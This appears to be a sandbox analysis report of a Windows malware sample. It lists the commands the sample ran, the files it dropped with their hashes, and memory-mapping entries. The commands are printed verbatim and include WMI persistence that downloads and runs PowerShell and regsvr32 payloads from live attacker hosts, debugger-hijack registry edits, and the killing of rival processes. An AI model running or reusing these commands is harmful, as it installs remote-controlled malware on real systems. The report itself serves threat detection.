[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="kvckavv3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 13000 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="kvckavv4", CommandLineTemplate="cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.ftp0212.site:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://185.26.113.95:8221/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://185.26.113.95:8096/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://185.26.113.95:8204/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://185.26.113.95:8205/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://185.26.113.95:8095/power.txt')||regsvr32 /u /s /i:http://185.26.113.95:8204/s.txt scrobj.dll&regsvr32 /u /s /i:http://185.26.113.95:8205/s.txt scrobj.dll&regsvr32 /u /s /i:http://185.26.113.95:8221/s.txt scrobj.dll&regsvr32 /u /s /i:http://185.26.113.95:8096/s.txt scrobj.dll&regsvr32 /u /s /i:http://185.26.113.95:8095/s.txt scrobj.dll&regsvr32 /u /s /i:http://wmi.ftp0212.site:8080/s.txt scrobj.dll&wmic os get /FORMAT:\"http://185.26.113.95:8220/s.xsl\""
    (The "&regsvr32" separators were rendered as the registered-trademark sign by an HTML-entity artifact in the original capture; restored here. The filter polls Win32_PerfFormattedData_PerfOS_System every 13000 seconds, so the consumer command line re-runs roughly every 3.6 hours.)
[4] C:\Windows\SysWOW64\cmd.exe | cmd /c start wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"kvckavv3\"", Consumer="CommandLineEventConsumer.Name=\"kvckavv4\""
[5] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"kvckavv3\"", Consumer="CommandLineEventConsumer.Name=\"kvckavv4\""
[4] C:\Windows\SysWOW64\timeout.exe | timeout /t 40 /nobreak
    - Delays execution with timeout.exe
[4] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /im msinfo.exe
    - Kills process with taskkill
[4] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /im conhos.exe
    - Kills process with taskkill
[4] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /im conhot.exe
    - Kills process with taskkill
[4] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /im conhou.exe
    - Kills process with taskkill
[4] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /im rundll32.exe
    - Kills process with taskkill
[4] C:\Windows\SysWOW64\cacls.exe | cacls c:\windows\temp\conhou.exe /e /d system
[4] C:\Windows\SysWOW64\cacls.exe | cacls c:\windows\temp\conhos.exe /e /d system
[4] C:\Windows\SysWOW64\cacls.exe | cacls c:\windows\temp\conhot.exe /e /d system
[4] C:\Windows\SysWOW64\cacls.exe | cacls c:\windows\temp\conhous.exe /e /d system
[4] C:\Windows\SysWOW64\cacls.exe | cacls c:\windows\temp\conhoss.exe /e /d system
[4] C:\Windows\SysWOW64\cacls.exe | cacls c:\windows\system\msinfo.exe /e /d system
[4] C:\Windows\SysWOW64\cacls.exe | cacls c:\windows\debug\item.dat /e /d system
[4] C:\Windows\SysWOW64\cacls.exe | cacls c:\windows\debug\winu.bat /e /d system
[4] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /im msinfo.exe
    - Kills process with taskkill
[4] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /im conhos.exe
    - Kills process with taskkill
[4] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /im conhou.exe
    - Kills process with taskkill
[4] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /im conhous.exe
    - Kills process with taskkill
[4] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /im conhoss.exe
    - Kills process with taskkill
[4] C:\Windows\SysWOW64\taskkill.exe | taskkill /f /im rundll32.exe
    - Kills process with taskkill
[4] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhoss.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
[4] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhous.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
[4] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhot.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
[4] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhos.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
[4] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\conhou.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
[4] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msinfo.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete /TN "MicrosoftsWindows" /F
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete /TN "MicrosoftsWindowsu" /F
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete /TN "MicrosoftsWindowsa" /F
[4] C:\Windows\SysWOW64\schtasks.exe | SCHTASKS /Delete /TN "MicrosoftsWindowsu1" /F
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckamm3" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckamm4" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckamm4" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckamm4'" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="killmm3" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="killmm4" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="killmm4" DELETE
[4] C:\Windows\SysWOW64\Wbem\WMIC.exe | wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='killmm4'" DELETE
[4] C:\Windows\SysWOW64\cmd.exe | cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://185.26.113.95:8095/batpower2.txt')
[5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://185.26.113.95:8095/batpower2.txt')
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start c:\windows\inf\aspnet\lsma12.exe -p6⤵
- Loads dropped DLL
-
\??\c:\windows\inf\aspnet\lsma12.exec:\windows\inf\aspnet\lsma12.exe -p7⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn oka6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start c:\windows\inf\winnts.exe6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start c:\windows\inf\aspnet\excludess.exe6⤵
- Loads dropped DLL
-
\??\c:\windows\inf\aspnet\excludess.exec:\windows\inf\aspnet\excludess.exe7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start c:\windows\inf\aspnet\excludess2.exe6⤵
- Loads dropped DLL
-
\??\c:\windows\inf\aspnet\excludess2.exec:\windows\inf\aspnet\excludess2.exe7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im powershell.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im powershell.exe7⤵
- Kills process with taskkill
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {BAF9C06D-E662-4CB4-824B-0761493C79B1} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c start c:\windows\inf\aspnet\lsma12.exe -p2⤵
-
\??\c:\windows\inf\aspnet\lsma12.exec:\windows\inf\aspnet\lsma12.exe -p3⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\excludes
MD5 aa5b7a8546dafef6dc76aae4b8eb1282
SHA1 37d551e05cb15c71082a1a305cdf13132ad3a1a8
SHA256 d2b7b602afd65804a410dfadfb1bb9cd594e513fda7fdfa242d1237cb1ccf2b9
SHA512 0d674bef05c250aee6c5b3e312a124830a58d85c1102d4dca23504a91a072b12caead4ad3b7e118210652af211b00239934f7e02418915c07fc12bbd60004272
-
C:\Windows\Temp\ntuser.dat
MD5 2466183331792219dc19a0d09008bc4f
SHA1 27a78da31bda636f82f343faeea1ebb2b06cd2f8
SHA256 935978001c84f3f0d458ade10f113d60567f1edb43c5ae4c09541cf9a96a90ea
SHA512 d949019acffcac880451717e0e21105d7c7f31d130b5028df57d147c7262f9d75e6bba9983511d444caddb40e2bdb1f62cf659c4c8b54e91f05ec82fee8dcacd
-
C:\Windows\inf\aspnet\excludess.exe
MD5 5ca95841b2979a96453361358f6d860d
SHA1 4088c98c806596008b62cd17d59e8c9a01291f1a
SHA256 fe7cc5a2579668cb6afd239dc181c404ef602d72605fe46361e31cecb17187a2
SHA512 d1d7cd8463e4fec463173045fcdbcfd0db85e0af62faad0fea96098341c977279fddb6a6eecf40d1a94b4dd094eba1311caf98443422a89c8b68f76eec7bc8d1
-
C:\Windows\inf\aspnet\excludess2.exe
MD5 b90adc3845ca490d93301b4934618787
SHA1 657beaf3ef7988d3960e1d4d7177d0203c4d9dff
SHA256 39c7cfc51ff86a023b635fec42de605e672d9050711b70ae0a89b4ac50f245ea
SHA512 61423076e8394cdbbb5178d8d29f3c6e1e92d03c7b1d0641acdb8a1a133ba3a311cbf4814a61d3ccc5bb8648a2f85187aa6c95469ebf9abec8dd40730c6007fa
-
C:\Windows\inf\aspnet\lsma12.exe
MD5 93515e391ac22a065279cadd8551d2bc
SHA1 a5e565c37fa3747c1d17e0975d86258ae3de671e
SHA256 b942960f1b5ead6933f527b95e87cfc994ddaffc910dca727f56b04706161544
SHA512 2886a1f22c9ca4d52d6b07eccf9d4890e774382d2bc0c14daf4358c506329f61c79c4327f9b6ff3ffc0a79068cbfe456c033ee9ad7ca3eb60a2faf5dbe08e67f
-
C:\Windows\temp\c3m.bat
MD5 f09b5034130b1b62367495e0caf7f859
SHA1 5896b28afc5081c8e83b3a593d4d879287fbca1d
SHA256 238eaf1c5a1d2706096529e152a51a0944507c1fc93b4f08648aaa9716901c6a
SHA512 a80054f9780e5055101ebeb0790988bf00e2a4a3e74df82df11d0c8063681fe8636fd807608f1fde8613f708cd5e54d58d4e74c7e6967d98461e1416ddca1baa
-
C:\windows\TEMP\n.vbs
MD5 31838bf97dfcae8710f2f18183e2c888
SHA1 2422dcf04d4385017d9a5ab676d6b7e0d95d9ab4
SHA256 ccbc9185434841ba52a8eaee221a322c200999b5f555bf7c76943cc3ad22c435
SHA512 945ae1351737ededa42ce9921f354240ab4205fd4ac4bdce47daae560ca7854a86e9afe23b9c7d60d30f8ae959768df049096041f38a5973d978d24b40da31bc
-
\??\c:\windows\inf\aspnet\config.json
MD5 64ef6c161e3303ed0868b5f106682a18
SHA1 1f34854dfab29016333a381dcb8e66249c67ae15
SHA256 2babf83d7a14c513b8a39ed20d1bf959376cd96a7350a47e61e56a277fa0cbd9
SHA512 4ef573f8e0aa10f74eb7160e41cbf701a0b4e2de0f321c6ef48b5c18689e8d7fafa1e8743cf2bc1adbd8753e6e1c3cb4ee32113f1719e48271cd38113d60b049
-
\??\c:\windows\inf\aspnet\excludess.exe
MD5 5ca95841b2979a96453361358f6d860d
SHA1 4088c98c806596008b62cd17d59e8c9a01291f1a
SHA256 fe7cc5a2579668cb6afd239dc181c404ef602d72605fe46361e31cecb17187a2
SHA512 d1d7cd8463e4fec463173045fcdbcfd0db85e0af62faad0fea96098341c977279fddb6a6eecf40d1a94b4dd094eba1311caf98443422a89c8b68f76eec7bc8d1
-
\??\c:\windows\inf\aspnet\excludess2.exe
MD5 b90adc3845ca490d93301b4934618787
SHA1 657beaf3ef7988d3960e1d4d7177d0203c4d9dff
SHA256 39c7cfc51ff86a023b635fec42de605e672d9050711b70ae0a89b4ac50f245ea
SHA512 61423076e8394cdbbb5178d8d29f3c6e1e92d03c7b1d0641acdb8a1a133ba3a311cbf4814a61d3ccc5bb8648a2f85187aa6c95469ebf9abec8dd40730c6007fa
-
\Windows\inf\aspnet\excludess.exe
MD5 5ca95841b2979a96453361358f6d860d
SHA1 4088c98c806596008b62cd17d59e8c9a01291f1a
SHA256 fe7cc5a2579668cb6afd239dc181c404ef602d72605fe46361e31cecb17187a2
SHA512 d1d7cd8463e4fec463173045fcdbcfd0db85e0af62faad0fea96098341c977279fddb6a6eecf40d1a94b4dd094eba1311caf98443422a89c8b68f76eec7bc8d1
-
\Windows\inf\aspnet\excludess2.exe
MD5 b90adc3845ca490d93301b4934618787
SHA1 657beaf3ef7988d3960e1d4d7177d0203c4d9dff
SHA256 39c7cfc51ff86a023b635fec42de605e672d9050711b70ae0a89b4ac50f245ea
SHA512 61423076e8394cdbbb5178d8d29f3c6e1e92d03c7b1d0641acdb8a1a133ba3a311cbf4814a61d3ccc5bb8648a2f85187aa6c95469ebf9abec8dd40730c6007fa
-
\Windows\inf\aspnet\lsma12.exe
MD5 93515e391ac22a065279cadd8551d2bc
SHA1 a5e565c37fa3747c1d17e0975d86258ae3de671e
SHA256 b942960f1b5ead6933f527b95e87cfc994ddaffc910dca727f56b04706161544
SHA512 2886a1f22c9ca4d52d6b07eccf9d4890e774382d2bc0c14daf4358c506329f61c79c4327f9b6ff3ffc0a79068cbfe456c033ee9ad7ca3eb60a2faf5dbe08e67f
-
memory/300-108-0x0000000000000000-mapping.dmp
-
memory/468-111-0x0000000000000000-mapping.dmp
-
memory/468-125-0x0000000000000000-mapping.dmp
-
memory/512-104-0x0000000000000000-mapping.dmp
-
memory/512-121-0x0000000000000000-mapping.dmp
-
memory/552-66-0x0000000000000000-mapping.dmp
-
memory/656-69-0x0000000000000000-mapping.dmp
-
memory/752-117-0x0000000000000000-mapping.dmp
-
memory/756-83-0x0000000000000000-mapping.dmp
-
memory/816-80-0x0000000000000000-mapping.dmp
-
memory/852-112-0x0000000000000000-mapping.dmp
-
memory/852-88-0x0000000000000000-mapping.dmp
-
memory/852-126-0x0000000000000000-mapping.dmp
-
memory/856-95-0x0000000000000000-mapping.dmp
-
memory/856-72-0x0000000000000000-mapping.dmp
-
memory/888-106-0x0000000000000000-mapping.dmp
-
memory/912-168-0x0000000006160000-0x0000000006161000-memory.dmp (Filesize 4KB)
-
memory/912-175-0x0000000006290000-0x0000000006291000-memory.dmp (Filesize 4KB)
-
memory/912-156-0x00000000047E2000-0x00000000047E3000-memory.dmp (Filesize 4KB)
-
memory/912-176-0x00000000062C0000-0x00000000062C1000-memory.dmp (Filesize 4KB)
-
memory/912-155-0x00000000047E0000-0x00000000047E1000-memory.dmp (Filesize 4KB)
-
memory/912-158-0x0000000004790000-0x0000000004791000-memory.dmp (Filesize 4KB)
-
memory/912-154-0x0000000004820000-0x0000000004821000-memory.dmp (Filesize 4KB)
-
memory/912-153-0x0000000000DB0000-0x0000000000DB1000-memory.dmp (Filesize 4KB)
-
memory/912-161-0x0000000005690000-0x0000000005691000-memory.dmp (Filesize 4KB)
-
memory/912-157-0x0000000001190000-0x0000000001191000-memory.dmp (Filesize 4KB)
-
memory/912-166-0x0000000005740000-0x0000000005741000-memory.dmp (Filesize 4KB)
-
memory/912-167-0x000000007EF30000-0x000000007EF31000-memory.dmp (Filesize 4KB)
-
memory/944-87-0x0000000000000000-mapping.dmp
-
memory/1000-67-0x0000000000000000-mapping.dmp
-
memory/1008-93-0x0000000000000000-mapping.dmp
-
memory/1064-115-0x0000000000000000-mapping.dmp
-
memory/1072-73-0x0000000000000000-mapping.dmp
-
memory/1108-103-0x0000000000000000-mapping.dmp
-
memory/1144-107-0x0000000000000000-mapping.dmp
-
memory/1168-116-0x0000000000000000-mapping.dmp
-
memory/1192-123-0x0000000000000000-mapping.dmp
-
memory/1192-84-0x0000000000000000-mapping.dmp
-
memory/1192-109-0x0000000000000000-mapping.dmp
-
memory/1196-122-0x0000000000000000-mapping.dmp
-
memory/1208-68-0x0000000000000000-mapping.dmp
-
memory/1228-91-0x0000000000000000-mapping.dmp
-
memory/1272-118-0x0000000000000000-mapping.dmp
-
memory/1272-75-0x0000000000000000-mapping.dmp
-
memory/1336-105-0x0000000000000000-mapping.dmp
-
memory/1336-65-0x0000000000000000-mapping.dmp
-
memory/1360-59-0x00000000752B1000-0x00000000752B3000-memory.dmp (Filesize 8KB)
-
memory/1472-114-0x0000000000000000-mapping.dmp
-
memory/1480-70-0x0000000000000000-mapping.dmp
-
memory/1512-86-0x0000000000000000-mapping.dmp
-
memory/1512-110-0x0000000000000000-mapping.dmp
-
memory/1512-124-0x0000000000000000-mapping.dmp
-
memory/1604-99-0x0000000000000000-mapping.dmp
-
memory/1664-85-0x0000000000000000-mapping.dmp
-
memory/1672-94-0x0000000000000000-mapping.dmp
-
memory/1672-71-0x0000000000000000-mapping.dmp
-
memory/1676-82-0x0000000000000000-mapping.dmp
-
memory/1680-92-0x0000000000000000-mapping.dmp
-
memory/1700-102-0x0000000000000000-mapping.dmp
-
memory/1720-119-0x0000000000000000-mapping.dmp
-
memory/1724-101-0x0000000000000000-mapping.dmp
-
memory/1732-100-0x0000000000000000-mapping.dmp
-
memory/1736-77-0x0000000000000000-mapping.dmp
-
memory/1756-89-0x0000000000000000-mapping.dmp
-
memory/1756-184-0x0000000002000000-0x0000000002001000-memory.dmp (Filesize 4KB)
-
memory/1756-113-0x0000000000000000-mapping.dmp
-
memory/1768-81-0x0000000000000000-mapping.dmp
-
memory/1772-64-0x0000000000000000-mapping.dmp
-
memory/1780-79-0x0000000000000000-mapping.dmp
-
memory/1780-120-0x0000000000000000-mapping.dmp
-
memory/1816-98-0x0000000000000000-mapping.dmp
-
memory/1820-90-0x0000000000000000-mapping.dmp
-
memory/1956-78-0x0000000000000000-mapping.dmp
-
memory/1972-60-0x0000000000000000-mapping.dmp
-
memory/1976-74-0x0000000000000000-mapping.dmp
-
memory/1984-76-0x0000000000000000-mapping.dmp
-
memory/1984-185-0x0000000000320000-0x0000000000330000-memory.dmp (Filesize 64KB)
-
memory/1984-179-0x00000000002F0000-0x0000000000300000-memory.dmp (Filesize 64KB)
-
memory/1984-197-0x0000000000350000-0x0000000000360000-memory.dmp (Filesize 64KB)
-
memory/1984-196-0x0000000000330000-0x0000000000340000-memory.dmp (Filesize 64KB)
-
memory/1984-199-0x00000000005F0000-0x0000000000600000-memory.dmp (Filesize 64KB)
-
memory/1984-198-0x0000000000340000-0x0000000000350000-memory.dmp (Filesize 64KB)
-
memory/1988-96-0x0000000000000000-mapping.dmp
-
memory/2036-97-0x0000000000000000-mapping.dmp